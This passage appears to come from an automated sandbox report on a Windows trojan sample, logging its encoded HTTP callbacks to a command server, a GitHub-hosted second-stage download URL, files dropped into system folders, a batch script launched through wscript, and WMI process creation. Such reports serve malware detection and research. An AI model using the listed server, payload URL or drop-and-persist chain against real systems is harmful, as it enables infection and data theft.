lVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru

Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: ca91547.tw1.ru

Source: unknown

HTTP traffic detected: POST /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryNxmnOXYO8CVog1eTUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ca91547.tw1.ruContent-Length: 81980Expect: 100-continueConnection: Keep-Alive

Source: UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002CA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ca91547.tw1.ru
Source: UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002C07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ca91547.tw1.ru/
Source: UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002CA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ca91547.tw1.ru/L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmd
Source: UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002C07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ca91547.tw1.ru/L1nc0In.php?kladSzP6lHuJ4aKJis7YXjQcYTaP=5JsuJU&42967b720727e4e345f9f350ee86f8
Source: LaRHzSijsq.exe, 00000000.00000002.1742291548.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: LaRHzSijsq.exe, 00000000.00000002.1742291548.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.comd
Source: LaRHzSijsq.exe, 00000000.00000002.1742291548.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, WinLatency.exe, 00000006.00000002.1878443146.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, UplbXNLOfTNXjbhPJQLmKdgT.exe, 00000026.00000002.4145617404.0000000002C07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LaRHzSijsq.exe, 00000000.00000002.1742291548.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: LaRHzSijsq.exe	String found in binary or memory: https://raw.githubusercontent.com/UnhitRat/Avast/refs/heads/main/Optmz.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Window created: window name: CLIPBRDWNDCLASS

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Process information set: 01 00 00 00

System Summary

PE file contains section with special chars

Source: LaRHzSijsq.exe	Static PE information: section name: cz}rRa^
Source: LaRHzSijsq.exe	Static PE information: section name: <gfAAjIM

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Code function: 2_2_007D718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

2_2_007D718C

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Windows\Provisioning\Cosa\330defd625eedf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	File created: C:\Windows\Tasks\330defd625eedf	Jump to behavior

Source: C:\Users\user\Desktop\LaRHzSijsq.exe	Code function: 0_2_01380871	0_2_01380871
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007D857B	2_2_007D857B
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007D407E	2_2_007D407E
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007FD00E	2_2_007FD00E
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007E70BF	2_2_007E70BF
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_00801194	2_2_00801194
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007F02F6	2_2_007F02F6
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007DE2A0	2_2_007DE2A0
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007D3281	2_2_007D3281
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007E6646	2_2_007E6646
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007F473A	2_2_007F473A
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007F070E	2_2_007F070E
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007D27E8	2_2_007D27E8
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007E37C1	2_2_007E37C1
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007DE8A0	2_2_007DE8A0
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007DF968	2_2_007DF968
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007F4969	2_2_007F4969
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007E6A7B	2_2_007E6A7B
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007E3A3C	2_2_007E3A3C
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007FCB60	2_2_007FCB60
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007F0B43	2_2_007F0B43
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007E5C77	2_2_007E5C77
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007E3D6D	2_2_007E3D6D
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007DED14	2_2_007DED14
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007EFDFA	2_2_007EFDFA
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007DDE6C	2_2_007DDE6C
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007DBE13	2_2_007DBE13
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007F0F78	2_2_007F0F78
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007D5F3C	2_2_007D5F3C
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Code function: 6_2_00007FFD9B7533B8	6_2_00007FFD9B7533B8
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Code function: 6_2_00007FFD9B753565	6_2_00007FFD9B753565
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Code function: 32_2_00007FFD9B7633B8	32_2_00007FFD9B7633B8
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Code function: 32_2_00007FFD9B772700	32_2_00007FFD9B772700
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Code function: 32_2_00007FFD9B76BDCC	32_2_00007FFD9B76BDCC
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Code function: 32_2_00007FFD9B76A1AF	32_2_00007FFD9B76A1AF
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Code function: 32_2_00007FFD9B76A1AF	32_2_00007FFD9B76A1AF
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Code function: 32_2_00007FFD9B76A1AF	32_2_00007FFD9B76A1AF
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Code function: 32_2_00007FFD9B76B060	32_2_00007FFD9B76B060
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Code function: 32_2_00007FFD9B76A1AF	32_2_00007FFD9B76A1AF
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Code function: 32_2_00007FFD9B76A1AF	32_2_00007FFD9B76A1AF
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Code function: 35_2_00007FFD9B773565	35_2_00007FFD9B773565
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 37_2_00007FFD9B76A605	37_2_00007FFD9B76A605
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 37_2_00007FFD9B76BDCC	37_2_00007FFD9B76BDCC
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 37_2_00007FFD9B76B220	37_2_00007FFD9B76B220
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 37_2_00007FFD9B763565	37_2_00007FFD9B763565
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B763565	38_2_00007FFD9B763565
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B76B258	38_2_00007FFD9B76B258
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B76BDCC	38_2_00007FFD9B76BDCC
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B76A605	38_2_00007FFD9B76A605
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B77FAF5	38_2_00007FFD9B77FAF5
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B77E4D9	38_2_00007FFD9B77E4D9
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B8B6BA9	38_2_00007FFD9B8B6BA9
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B775D60	38_2_00007FFD9B775D60

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: String function: 007EE28C appears 35 times
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: String function: 007EE360 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: String function: 007EED00 appears 31 times

Source: WinLatency.exe.2.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: UplbXNLOfTNXjbhPJQLmKdgT.exe.6.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: UplbXNLOfTNXjbhPJQLmKdgT.exe0.6.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: LaRHzSijsq.exe, 00000000.00000002.1742291548.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs LaRHzSijsq.exe
Source: LaRHzSijsq.exe, 00000000.00000000.1689751552.00000000009B4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOPTIMZ.exe. vs LaRHzSijsq.exe
Source: LaRHzSijsq.exe, 00000000.00000002.1742291548.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs LaRHzSijsq.exe
Source: LaRHzSijsq.exe, 00000000.00000002.1741726881.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs LaRHzSijsq.exe
Source: LaRHzSijsq.exe	Binary or memory string: OriginalFilenameOPTIMZ.exe. vs LaRHzSijsq.exe

Source: LaRHzSijsq.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: LaRHzSijsq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: LaRHzSijsq.exe

Static PE information: Section: cz}rRa^ ZLIB complexity 1.0071614583333333

Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, fQUZgP4ZIgO94vXhqvC.cs	Cryptographic APIs: 'TransformBlock'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, fQUZgP4ZIgO94vXhqvC.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, EEvO9XYxD1PUC4GnMMu.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, EEvO9XYxD1PUC4GnMMu.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, fQUZgP4ZIgO94vXhqvC.cs	Cryptographic APIs: 'TransformBlock'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, fQUZgP4ZIgO94vXhqvC.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, EEvO9XYxD1PUC4GnMMu.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, EEvO9XYxD1PUC4GnMMu.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, zAUuJ1guRoQ0B2pZg7h.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, zAUuJ1guRoQ0B2pZg7h.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, zAUuJ1guRoQ0B2pZg7h.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, zAUuJ1guRoQ0B2pZg7h.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@54/30@2/2

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Code function: 2_2_007D6EC9 GetLastError,FormatMessageW,

2_2_007D6EC9

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Code function: 2_2_007E9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

2_2_007E9E1C

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe

File created: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe

Jump to behavior

Source: C:\Users\user\Desktop\LaRHzSijsq.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LaRHzSijsq.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\c5bb01c77556b1147d459f156fa6a356b7f5e9a0

Source: C:\Users\user\Desktop\LaRHzSijsq.exe

File created: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WinSattl\9Jks4Q9248ljrax16iPG1ojfLKPqxh.bat" "

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Command line argument: sfxname	2_2_007ED5D4
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Command line argument: sfxstime	2_2_007ED5D4
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Command line argument: STARTDLG	2_2_007ED5D4

Source: LaRHzSijsq.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
